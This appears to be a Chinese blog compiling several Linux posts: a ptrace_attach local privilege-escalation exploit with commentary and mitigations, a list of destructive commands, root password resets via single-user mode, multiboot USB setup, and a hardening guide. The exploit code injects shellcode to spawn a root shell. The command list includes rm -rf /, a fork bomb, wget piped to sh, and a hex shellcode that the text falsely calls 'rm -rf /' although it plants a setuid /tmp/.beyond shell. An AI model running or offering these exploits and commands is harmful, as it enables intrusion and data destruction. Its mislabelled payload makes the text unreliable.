Chinadu's Blog

加点其他跟这个漏洞相关的信息。
----------------------------
素包子：
素包子快速的看了下漏洞利用程序，原理应该是通过 ptrace挂到一个suid root程序上，然后利用ptrace_attach函数的漏洞，以root权限执行指令，产生/tmp/.exp这个local root shell。不幸中的万幸，这个exp写的稍微有点问题，在REDHAT里需要稍作修改才能成功获得root权限。
素包子提供几个临时解决方案以供大家选择（以下方案由简至难）：
1、禁用本地所有普通用户账号，直到发布补丁。此方案无法防止有webshell的黑客获得root权限。
2、禁用系统所有的suid root程序，直到发布补丁。此方案会导致系统部分功能无法正常使用。
3、安装sptrace LKM禁用普通用户使用ptrace。此方案对业务影响相对较小，但实施较为复杂。
----------------------------
noop：
漏洞并不是本来存在于ptrace里面的，而是因为在2.6.29中引入了cred_exec_mutex互斥对象，但是使用的时候lock错了对象造成的。所以2.6.29以下版本不要去动脑筋了，没用的。

/*
ptrace_attach privilege escalation exploit by s0m3b0dy

main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("\n[-] read registers\n");
    exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("\n[-] write shellcode\n");
      exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}


Linux作为开放式的操作系统受到很多程序员的喜爱，很多高级程序员都喜欢编写Linux操作系统的相关软件。这使得Linux操作系统有着丰富的软件支持，还有无数的技术人员作为技术后盾和技术支持，这使得Linux越来越受到程序员的欢迎。

　　但这种开放式的操作系统有一个最大的弊端就是每个程序员的水平不等，编写相关软件后并未注意自己程序中的漏洞。没有统一的漏洞检查，这使得Linux的软件中会出现很多的漏洞，而软件开发者却很难察觉自己编写程序的漏洞，但黑客们会非常注意这些漏洞，并且会利用这些漏洞来达到自己的目的。那么是不是 Linux系统就不安全了呢？其实大可不必担心，只要做好下述几点便可安心的使用Linux系统。

　　一、取消不必要的服务

　　早期的Unix版本中，每一个不同的网络服务都有一个服务程序在后台运行，后来的版本用统一的/etc/inetd服务器程序担此重任。Inetd是 Internetdaemon的缩写，它同时监视多个网络端口，一旦接收到外界传来的连接信息，就执行相应的TCP或UDP网络服务。

　　由于受inetd的统一指挥，因此Linux中的大部分TCP或UDP服务都是在/etc/inetd.conf文件中设定。所以取消不必要服务的第一步就是检查/etc/inetd.conf文件，在不要的服务前加上“#”号。

　　一般来说，除了http、smtp、telnet和ftp之外，其他服务都应该取消，诸如简单文件传输协议tftp、网络邮件存储及接收所用的imap/ipop传输协议、寻找和搜索资料用的gopher以及用于时间同步的daytime和time等。

　　还有一些报告系统状态的服务，如finger、efinger、systat和netstat等，虽然对系统查错和寻找用户非常有用，但也给黑客提供了方便之门。例如，黑客可以利用finger服务查找用户的电话、使用目录以及其他重要信息。因此，很多Linux系统将这些服务全部取消或部分取消，以增强系统的安全性。

　　Inetd除了利用/etc/inetd.conf设置系统服务项之外，还利用/etc/services文件查找各项服务所使用的端口。因此，用户必须仔细检查该文件中各端口的设定，以免有安全上的漏洞。

　　在Linux中有两种不同的服务型态：一种是仅在有需要时才执行的服务，如finger服务；另一种是一直在执行的永不停顿的服务。这类服务在系统启动时就开始执行，因此不能靠修改inetd来停止其服务，而只能从修改/etc/rc.d/rc[n].d/文件或用Runleveleditor去修改它。提供文件服务的NFS服务器和提供NNTP新闻服务的news都属于这类服务，如果没有必要，最好取消这些服务。

　　二、限制系统的出入

　　在进入Linux系统之前，所有用户都需要登录，也就是说，用户需要输入用户账号和密码，只有它们通过系统验证之后，用户才能进入系统。

　　与其他Unix操作系统一样，Linux一般将密码加密之后，存放在/etc/passwd文件中。Linux系统上的所有用户都可以读到/etc /passwd文件，虽然文件中保存的密码已经经过加密，但仍然不太安全。因为一般的用户可以利用现成的密码破译工具，以穷举法猜测出密码。比较安全的方法是设定影子文件/etc/shadow，只允许有特殊权限的用户阅读该文件。

　　在Linux系统中，如果要采用影子文件，必须将所有的公用程序重新编译，才能支持影子文件。这种方法比较麻烦，比较简便的方法是采用插入式验证模块(PAM)。很多Linux系统都带有Linux的工具程序PAM，它是一种身份验证机制，可以用来动态地改变身份验证的方法和要求，而不要求重新编译其他公用程序。这是因为PAM采用封闭包的方式，将所有与身份验证有关的逻辑全部隐藏在模块内，因此它是采用影子档案的最佳帮手。

　　此外，PAM还有很多安全功能：它可以将传统的DES加密方法改写为其他功能更强的加密方法，以确保用户密码不会轻易地遭人破译；它可以设定每个用户使用电脑资源的上限；它甚至可以设定用户的上机时间和地点。

　　Linux系统管理人员只需花费几小时去安装和设定PAM，就能大大提高Linux系统的安全性，把很多攻击阻挡在系统之外。
三、保持最新的系统核心

　　由于Linux流通渠道很多，而且经常有更新的程序和系统补丁出现，因此，为了加强系统安全，一定要经常更新系统内核。

　　Kernel是Linux操作系统的核心，它常驻内存，用于加载操作系统的其他部分，并实现操作系统的基本功能。由于Kernel控制计算机和网络的各种功能，因此，它的安全性对整个系统安全至关重要。

　　早期的Kernel版本存在许多众所周知的安全漏洞，而且也不太稳定，只有2.0.x以上的版本才比较稳定和安全，新版本的运行效率也有很大改观。在设定Kernel的功能时，只选择必要的功能，千万不要所有功能照单全收，否则会使Kernel变得很大，既占用系统资源，也给黑客留下可乘之机。

　　在Internet上常常有最新的安全修补程序，Linux系统管理员应该消息灵通，经常光顾安全新闻组，查阅新的修补程序。

　　四、增强安全防护工具

　　SSH是安全套接层的简称，它是可以安全地用来取代rlogin、rsh和rcp等公用程序的一套程序组。SSH采用公开密钥技术对网络上两台主机之间的通信信息加密，并且用其密钥充当身份验证的工具。

　　由于SSH将网络上的信息加密，因此它可以用来安全地登录到远程主机上，并且在两台主机之间安全地传送信息。实际上，SSH不仅可以保障Linux主机之间的安全通信，Windows用户也可以通过SSH安全地连接到Linux服务器上。

　　五、限制超级用户的权力

　　我们在前面提到，root是Linux保护的重点，由于它权力无限，因此最好不要轻易将超级用户授权出去。但是，有些程序的安装和维护工作必须要求有超级用户的权限，在这种情况下，可以利用其他工具让这类用户有部分超级用户的权限。Sudo就是这样的工具。

　　Sudo程序允许一般用户经过组态设定后，以用户自己的密码再登录一次，取得超级用户的权限，但只能执行有限的几个指令。

　　六、设定用户账号的安全等级

　　除密码之外，用户账号也有安全等级，这是因为在Linux上每个账号可以被赋予不同的权限，因此在建立一个新用户ID时，系统管理员应该根据需要赋予该账号不同的权限，并且归并到不同的用户组中。

　　在Linux系统上的tcpd中，可以设定允许上机和不允许上机人员的名单。其中，允许上机人员名单在/etc/hosts.allow中设置，不允许上机人员名单在/etc/hosts.deny中设置。设置完成之后，需要重新启动inetd程序才会生效。此外，Linux将自动把允许进入或不允许进入的结果记录到/rar/log/secure文件中，系统管理员可以据此查出可疑的进入记录。

　　每个账号ID应该有专人负责。在企业中，如果负责某个ID的职员离职，管理员应立即从系统中删除该账号。很多入侵事件都是借用了那些很久不用的账号。

　　在用户账号之中，黑客最喜欢具有root权限的账号，这种超级用户有权修改或删除各种系统设置，可以在系统中畅行无阻。因此，在给任何账号赋予root权限之前，都必须仔细考虑。

　　Linux系统中的/etc/securetty文件包含了一组能够以root账
号登录的终端机名称。例如，在RedHatLinux系统中，该文件的初始值仅允许本地虚拟控制台(rtys)以root权限登录，而不允许远程用户以root权限登录。最好不要修改该文件，如果一定要从远程登录为root 权限，最好是先以普通账号登录，然后利用su命令升级为超级用户。

如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响.
有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地.

1. Code:


rm -rf /

这个很简单,根目录会被擦光.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


没看懂?呵呵,其实就是16进制的[rm -rf /].

3. Code:

mkfs.ext3 /dev/sda


抹盘行为无疑是危险的

4. Code:

:(){:|:&};:


这不是90后的表情,也不是托蒂射点球前的表情,它可以让你的系统迅速因为处理大量数据而死机.

5. Code:

any_command > /dev/sda


这个命令将会写入大量的RAW数据,可以导致数据丢失.

6. Code:

wget http://some_untrusted_source -O- | sh

和Windows一样,千万不要乱下载未经证实安全性的源,这年头Linux和胡萝卜一样,也不会保险.

7. Code:

mv /home/yourhomedirectory/* /dev/null


这条命令无疑会让系统抓狂,你的主目录会再也看不到.

这段时间老碰到有人问及各个linux版本的本地root密码破解方法，我这里自己以及在网络上搜集了些资料，希望对看到了这文章而又恰好用得到的技术人员有点帮助：

（一）RedHat/CentOS/Fedora 系统密码破解

1.在grub选项菜单按E进入编辑模式
2.编辑kernel 那行最后加上S (或者Single）
3.按B，启动到single-user mode
4.进入后执行下列命令
# mount -t proc proc /proc
# mount -o remount,rw /
#passwd
#sync
#reboot

（二）Debian linux 系统密码破解

1.在grub选项菜单'Debian GNU/Linux,...(recovery mode)'，按e进入编辑模式
2.编辑kernel那行最后面的 ro single 改成 rw single init=/bin/bash，按b执行重启
3.进入后执行下列命令
root@(none)#mount -a
root@(none)#passwd root
root@(none)#reboot

（三）Freebsd 系统密码破解

1.开机进入引导菜单
2.选择每项(按4)进入单用户模式
3.进入之后输入一列命令
root@#mount -a
root@#fsck -y
root@#passwd(修改密码命令)
root@#root(要破解密码的用户名)
Enter new unix password:
root@#init 6 (重启)

（四）Solaris 系统密码破解

1.在grub选项菜中选择solaris failasfe 项
2.系统提示Do you wish to have it mounted read-write on /a ?[y,n,?] 选择y
3.就进入单用户模式
4.输入下列命令:passwd
root@#init 6 (重启)

（五）NetBsd 系统密码破解

1.开机：当出现提示符号并开始倒数五秒时， 键入以下指令：
> boot -s (进入单用户模式命令)
2.在以下的提示符号中
Enter pathname of shell or RETURN for sh:
按下 Enter。
3.键入以下指令：
# mount -a
# fsck -y
4.使用 passwd 更改 root 的密码。
5.使用 exit 指令进入多人模式。

（六）SUSE 系统密码破解

1.重新启动机器，在出现grub引导界面后，在启动linux的选项里加上init=/bin/bash，通过给内核传递init=/bin/bash参数使得OS在运行login程序之前运行bash，出现命令行。
2.稍等片刻出现(none)#:命令行。
3.这时输入mount -n / -o remount,rw 表示将根文件系统重新mount为可读写，有了读写权限后就可以通过passwd命令修改密码了。
4.这时输入passwd命令就可以重置密码了
5.修改完成后记得用mount -n / -o remount,ro将根文件系统置为原来的状态。

我的4G U盘只装一个BT3貌似太浪费了,所以就顺便把Slax,Damn Small Linux,Puppy Linux这些迷你linux系统一起装上~装完后也才1G多点~

步骤一:把要装的系统下载回来,解压缩,并把U盘格式化成FAT32文件系统



步骤二:

把Slax的两个文件夹[boot和slax]复制到U盘,

把BackTrack3的两个文件夹[boot和BT3,boot改名成bootbt3]复制到U盘

把damn small linux的两个文件夹[boot和KNOPPIX,boot改名成bootdsl]复制到U盘

把puppy linux的4个文件[VMLINUZ,INITRD.GZ,PUP_400.SFS,ZDRV_400.SFS]复制到U盘





步骤三:(可以不做,我比较喜欢干净,所以我把不用的都删掉)

把bootbt3下的文件(除了vmlinuz和initrd.gz)全部删掉

把bootdsl下的文件(除了linux24和minirt24.gz)全部删掉



步骤四:

运行/boot/bootinst.bat

修改/boot/syslinux/syslinux.cfg 内容如下

PROMPT 0
TIMEOUT 90
DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/slax.png

MENU WIDTH 36
MENU MARGIN 0
MENU ROWS 10
MENU HELPMSGROW 14
MENU TIMEOUTROW 22
MENU TABMSGROW 24
MENU CMDLINEROW 24
MENU HSHIFT 40
MENU VSHIFT 2

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #00000000 #00000000 none
menu color unsel 37;44 #ff60CA00 #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
menu color sel 7;37;40 #ffffffff #ff60CA00 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

LABEL BT3
MENU LABEL BT3 Text mode Frame Buffer
KERNEL /bootbt3/vmlinuz
APPEND vga=0x317 initrd=/bootbt3/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw

LABEL copy2ram
MENU LABEL BT3 Graphics mode, Copy To RAM
KERNEL /bootbt3/vmlinuz
APPEND vga=0x317 initrd=/bootbt3/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw copy2ram autoexec=xconf;kdm

LABEL startx
MENU LABEL Slax Graphics VESA mode No Save
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=telinit~4

LABEL slax
MENU LABEL Slax Text mode
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw

LABEL cp2ram
MENU LABEL Slax Copy To RAM
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw copy2ram autoexec=xconf;telinit~4

LABEL startxsave
MENU LABEL Slax Graphics VESA mode Save
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=telinit~4 changes=/slax/

LABEL dsl
MENU LABEL Damn Small Linux
KERNEL /bootdsl/linux24
APPEND ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=791 initrd=/bootdsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=/knoppix

LABEL dsl-txt
MENU LABEL Damn Small Linux Text Mode
KERNEL /bootdsl/linux24
APPEND ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=normal initrd=/bootdsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=/knoppix

LABEL puppy
MENU LABEL Puppy Linux
KERNEL /VMLINUZ
APPEND initrd=/INITRD.GZ pmedia=cd

LABEL memtest86
MENU LABEL Run Memtest utility
KERNEL /boot/mt86p

我一直使用光盘安装系统，但是光盘介质容易损坏，而且系统一旦升级，又要重新刻过光盘。
上个星期，看到一篇文章，介绍使用U盘安装系统，受到启发，开始制作自己的多功能U盘。

工作环境：Linux及FreeBSD
工具:U盘一个(大于64M)

1、格式化U盘：
因为想在windows下也能使用U盘，所以把U盘格式成FAT32格式

进入Linux，格式化U盘

#mkfs.vfat /dev/sda1

2、在U盘上安装grub：

#grub --no-floppy

grub>root (hd1,0)

grub>setup (hd1)

......

grub>quit

#mkdir /mnt/usb
#mount /dev/sda1 /mnt/usb
#mkdir -p /mnt/usb/boot/{grub,kernel,image}
#cp /boot/grub/stage{1,2} /mnt/usb/boot/grub
#cp /boot/grub/fat_stage1_5 /mnt/usb/boot/grub

3、加入Ubuntu 8.04启动项:

打开链接：http://ubuntu.cn99.com/ubuntu/dists/hardy/main/installer-i386/current/images/netboot/ubuntu-installer/i386/

下载ubuntu 8.04的两个文件:linux和initrd.gz，并分别改名ubuntu804和ubuntu804.gz

#mv linux ubuntu804
#mv initrd.gz ubuntu804.gz

将这两个文件复制到U盘上：

#cp ubuntu804 /mnt/usb/boot/kernel
#cp ubuntu804.gz /mnt/usb/boot/image


编辑menu.lst文件，若没有则创建：

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容：

default 0
timeout 300

title Ubuntu-8.04-installer
kernel /boot/kernel/ubuntu804
initrd /boot/image/ubuntu804.gz

加入debian、CentOS、RHEL4的步骤与上面基本相同

4、加入OpenBSD 4.3安装项：

首先复制memdisk到U盘上:

#cp /usr/lib/syslinux/memdisk /mnt/usb/boot/kernel
#gzip -9 /mnt/usb/boot/kernel/memdisk

到OpenBSD的FTP站点下载启动文件floppy43.fs:
ftp://ftp.freebsdchina.org/pub/OpenBSD/4.3/i386/floppy43.fs

#mv floppy43.fs openbsd43.fs
#cp openbsd43.fs /mnt/usb/boot/image

修改menu.lst：

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容：

title OpenBSD-4.3-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/openbsd43.fs

5、加入NetBSD 4.0安装项:

到NetBSD的FTP站点下载启动文件boot-big.fs:
ftp://ftp.netbsd.org/pub/NetBSD/NetBSD-4.0/i386/installation/floppy/boot-big.fs

#mv boot-big.fs netbsd40.fs
#cp netbsd40.fs /mnt/usb/boot/image

修改menu.lst：

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容：

title NetBSD-4.0-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/netbsd40.fs

卸载U盘:

#umount /mnt/usb

6、加入FreeBSD 7.0安装项：

加入FreeBSD的安装启动项比较复杂，需要在FreeBSD6.X或FreeBSD7.X下操作

装载U盘:

#mkdir /mnt/usb
#mount -t msdosfs /dev/da0s1 /mnt/usb

到FreeBSD的FTP站点下载启动文件(boot.flp、kern1.flp、kern2.flp、kern3.flp、mfsroot1.flp):

复制启动文件boot.flp中的内容到临时文件夹boot_tmp下：
#mkdir /mnt/cd
#mdconfig -a -t vnode -f boot.flp -u 0
#mount /dev/md0 /mnt/cd
#mkdir boot_tmp
#cp -R /mnt/cd/* boot_tmp/
#umount /mnt/cd
#mdconfig -d -u 0

查看boot_tmp下的kernel.gz.split和mfsroot.gz.split这两个文件，可以知道kernel.gz文件被分割成了四个文件：kernel.gz.boot、kernel.gz.aa、kernel.gz.ab、kernel.gz.ac,而mfsroot.gz被分割成了mfsroot.gz.boot和mfsroot.gz.aa两个文件，下面就是要把这几个分割开的文件合并到一起;

合并kernel.gz文件:
#mdconfig -a -t vnode -f kern1.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.aa >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mdconfig -a -t vnode -f kern2.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.ab >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mdconfig -a -t vnode -f kern3.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.ac >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mv boot_tmp/kernel.gz.boot boot_tmp/kernel.gz
至此kernel.gz合并完毕

合并mfsroot.gz文件:
#mdconfig -a -t vnode -f mfsroot1.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/mfsroot.gz.aa >> boot_tmp/mfsroot.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mv boot_tmp/mfsroot.gz.boot boot_tmp/mfsroot.gz
至此mfsroot.gz合并完毕

另外还需要做额外一些工作:
#rm -f boot_tmp/{kernel,mfsroot}.gz.split

修改boot_tmp/boot/loader.conf文件，删除含有"Insert floppy"的两行

再把boot_tmp下的内容打包成启动文件：
#dd if=/dev/zero of=freebsd70 bs=1k count=6800
#mdconfig -a -t vnode -f freebsd70 -u 0
#disklabel -Bw /dev/md0
#newfs /dev/md0a
#mkdir /mnt/hd
#mount /dev/md0a /mnt/hd
#cp -R boot_tmp/* /mnt/hd
#umount /mnt/hd
#mdconfig -d -u 0
#gzip -9 freebsd70
#cp freebsd70.gz /mnt/usb/boot/image/

修改menu.lst:

#vi /mnt/usb/boot/grub/menu.lst

包含以下内容:

title FreeBSD-7.0-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/freebsd70.gz


卸载U盘

#umount /mnt/usb

Linux 的系统安全不容忽视.然而系统加固又不是一件很容易的事.本文作者简单介绍了一下 Linux 系统深度安全加固。

注：以下内容可能不适用于某些场合，请对号入座

1. 安装和升级

尽量选用最新的 Linux 发行版本，安装前拔掉网线，断开物理连接，安装时建议用 custom 自定义方式安装软件包，数量以少为好，一般来说服务器没有必要安装 X-windows，在 lilo/grub 引导器中加入口令限制，防止能够物理接触的恶意用户因为 Linux 安装光盘的 rescue 模式可以跳过这个限制，所以还要给bios加上密码或服务器机箱上锁 /var， /home， /usr， /root 等目录用独立的物理分区，防止垃圾数据和日志填满硬盘而导致 D.o.S 攻击。

root 账号给予强壮的口令，安装完毕立即用 up2date 或 apt 升级系统软件，有时升级内核也是必要的，因为内核出现问题同样会给攻击者提供机会Apt 是 Debian GNU Linux 下的一个强大的包管理工具，也可用于其他版本的 Linux.

2. 账号

如果系统中的用户比较多，可以编辑 /etc/login.defs，更改密码策略,删除系统中不必要帐户和组:

[root@ayazero /]# userdel -r username


如果不开匿名 ftp 则可以把 ftp 账号也删了。最安全的方式是本地维护，可惜不太现实，但还是需要限制 root 的远程访问，管理员可以用普通账户远程登录，然后 su 到 root，我们可以把使用 su 的用户加到 wheel 组来提高安全性在 /etc/pam.d/su 文件的头部加入下面两行：

auth sufficient /lib/security/pam_rootok.so debug 
auth required /lib/security/pam_wheel.so group=wheel


然后把可以执行 su 的用户放入 wheel 组：

[root@ayazero /]# usermod -G10 admin


编辑 /etc/securetty，注释掉所有允许 root 远程登录的控制台，然后禁止使用所有的控制台程序：

[root@ayazero /]# rm -f /etc/security/console.apps/servicename


登录采用加密的 ssh，如果管理员只从固定的终端登陆，还应限制合法 ssh 客户端的范围防止嗅探及中间人攻击，将命令历史纪录归为零，尽可能的隐藏你做过的事情：

[root@ayazero /]# unset HISTFILESIZE


3. 服务

最少服务原则，凡是不需要的服务一律注释掉在 /etc/inetd.conf 中不需要的服务前加 "#"，较高版本中已经没有 inetd 而换成了 Xinetd;取消开机自动运行服务，把 /etc/rc.d/rc3.d 下不需要运行的服务第一个字母大写改称小写，或者由 setup 命令启动的 GUI 界面中的 service 更改。

如果你希望简单一点，可以使用 /etc/host.allow，/etc/host.deny 这两个文件，但是本文计划用 iptables 防火墙，所以不在此详述。

4. 文件系统权限

找出系统中所有含 "s" 位的程序，把不必要得 "s" 位去掉，或者把根本不用的直接删除:

[root@ayazero /]# find / -type f ( -perm -04000 -o -perm -02000 ) -exec ls -lg {} 
[root@ayazero /]# chmod a-s filename


防止用户滥用及提升权限的可能性,把重要文件加上不可改变属性:

[root@ayazero /]# chattr +i /etc/passwd 
[root@ayazero /]# chattr +i /etc/shadow 
[root@ayazero /]# chattr +i /etc/gshadow 
[root@ayazero /]# chattr +i /etc/group 
[root@ayazero /]# chattr +i /etc/inetd.conf 
[root@ayazero /]# chattr +i /etc/httpd.conf 
...............................


具体视需要而定，我怀疑现在的入侵者都知道这个命令，有些 exploit 溢出后往 inetd.conf 写一条语句绑定 shell 在一个端口监听，此时这条命令就起了作用，浅薄的入侵者会以为溢出不成功。找出系统中没有属主的文件:

[root@ayazero /]# find / -nouser -o -nogroup


找出任何人都有写权限的文件和目录:

[root@ayazero /]# find / -type f ( -perm -2 -o -perm -20 ) -exec ls -lg {} 
[root@ayazero /]# find / -type d ( -perm -2 -o -perm -20 ) -exec ls -ldg {}


防止入侵者向其中写入木马语句(诸如一个shell的拷贝)或继承属主权限而非法访问。找出并加固那些历来被入侵者利用的文件，比如 .rhosts。编辑 /etc/security/limits.conf，加入或改变如下行:

* hard core 0 
* hard rss 5000 
* hard nproc 20


5. Banner 伪装

入侵者通常通过操作系统，服务及应用程序版本来攻击，漏洞列表和攻击程序也是按此来分类，所以我们有必要作点手脚来加大入侵的难度。 更改 /etc/issue，因为 reboot 后重新加载，所以编辑 /ect/rc.d/rc.local：

# This will overwrite /etc/issue at every boot. So， make any changes you 
# want to make to /etc/issue here or you will lose them when you reboot. 
#echo "" > /etc/issue 
#echo "$R" >> /etc/issue 
#echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue 
# 
#cp -f /etc/issue /etc/issue.net 
#echo >> /etc/issue


Apache 不回显版本，apache 的配置文件，找到 ServerTokens 和 ServerSignature 两个 directive，修改默认属性：

#ServerTokens Full 
ServerTokens Prod <---------- 
#ServerSignature On 
ServerSignature Off <----------


修改 uname，拿出 uname.c 的源码，找到如下行：

print_element (PRINT_SYSNAME， name.sysname);//操作系统名如 linux 
print_element (PRINT_NODENAME， name.nodename);//主机名 
print_element (PRINT_RELEASE， name.release);//发行版本，如：2.4.20-18 
print_element (PRINT_VERSION， name.version);// 
print_element (PRINT_MACHINE， name.machine);//机器类型，如i686 
print_element (PRINT_PROCESSOR， processor);//处理器类型


可以修改为：

print_element (PRINT_SYSNAME，"HP-UX"); 
.......


编译后替换 /bin/uname

其他服务及程序的修改可以查看其配置文件或者源码不要改太多，否则会给系统管理带来太麻烦。



6. Iptales 防火墙规则

假设我们的服务器 server1 运行 apache，sshd (sshd 可以不运行在标准端口，配置文件中能修改)eth0 网卡接 Internet，eth1 连接 LAN，管理员在家中拨号登陆到 server2 (其私用网络 IP 为 192.168.0.12)，再登陆 server1[roor@ayazero root]# iptables -A INPUT -i eth1 -s 192.168.0.12 -p tcp --dport 22 -j ACCEPT为防止 IP spoofing 的可能，还可以绑定 server2 的网卡地址：sh-2.05b# iptables -A INPUT -i eth1 -s 192.1
68.0.12 --mac-source 01:68:4B:91:CC:B7 -p tcp --dport 22 -j ACCEPT不过好像也很少有入侵者能够做到这种地步，而且没什么利用的价值。

[root@ayazero root]# iptables -A INPUT -i
eth0 -p tcp --dport 80 -j ACCEPT 
[root@ayazero root]# iptables -A INPUT -m 
state --state ESTABLISHED，RELATED -j ACCEPT 
[root@ayazero root]# iptables -A INPUT -j DROP


对攻击有所了解的人都知道“端口重定向+反向管道”的美妙结合来穿越防火墙的例子吧这种技巧已经运用太广，而危害很大为了对抗这种难以防御的攻击，我们必须以牺牲一定的易用性为代价 [root@ayazero root]# iptables -A OUTPUT -o eth0 -p tcp --syn -j DROP以上规则将阻止由内而外的 TCP 主动连接另外，用 tftp 或其他客户端反向攫取文件的攻击行为也很普遍，由于 tftp 以及其他一些工具依赖 UDP，所以现在要把它彻底抹煞掉[root@ayazero root]# iptables -A OUTPUT -o eth0 -p udp -j DROPPS: 在更新系统和调试网络时需要把这两条规则临时去掉因为入侵的本质就是通过文本或图形界面在标准或非标准端口得到目标操作系统的 shell，所以，这不仅能阻止反向管道本身，还能免疫很多入侵技巧不过对一般的系统管理员而言，这太苛刻了！iptables 的一些攻击对策:

Syn-flood protection: 
[root@ayazero foo]# iptables -A FORWARD -p 
tcp --syn -m limit --limit 1/s -j ACCEPT 
　　
Furtive port scanner: 
[root@ayazero foo]# iptables -A FORWARD -p 
tcp --tcp-flags SYN，ACK，FIN，RST RST -m limit --limit 1/s -j ACCEPT 
　　
Ping of death: 
[root@ayazero foo]# iptables -A FORWARD -p 
icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT


此外，iptables 还能配置出让一些扫描行为比如 nmap 失效的规则，应当注意：防火墙不是万能的，当一个攻击者足够疯狂时，不要指望你的防火墙能抵挡得住 DDoS 的洪水。关于 iptables 得更多细节，请参阅 Rusty Russell 的 Packet Filtering HOWTO。

7. 完整性校验

tripwire 是一个比较有名的工具，它能帮你判断出一些重要系统文件是否被修改过现在的 Linux 发行版中一般都带有他的开源版本，在默认的校验对象配置文件中加入一些敏感文件就可以使用RPM MD5 校验:

[root@ayazero rpm]# rpm -V


用 "man rpm" 查看命令帮助，"-V" 参数用于 MD5 校验，注意要把 rpm 校验产生的二进制数据文件作一个硬备份，以防止其本身被修改。


8. 自行扫描

普通的安全加固基本上是做完了，现在让我们来对自己做的系统做一个风险评估，推荐使用 nessus latest version [homepage:http://www.nessus.org](既然从头到尾用的都是开源的东西，这里也继续节约成本，呵呵)也许你觉得自己的系统没有问题了，但有时 nessus 还是能报告出一些问题，比如一个第三方的 webmail 有某些安全缺陷，如果没有问题最好，有问题我们再回去修补。

9. 高级技巧

以上的措施已经足以让大多数入侵者望而却步，接下来的部分给那些对安全极度敏感的偏执狂 缓冲区溢出对策中有: stackgurad，stackshield，formatguard，heapguard，pointguard 等编译技术，但他们需要重新编译源码，不仅麻烦而且会使系统性能有所下降.所以这里打算用防止缓冲区溢出的内核补丁。

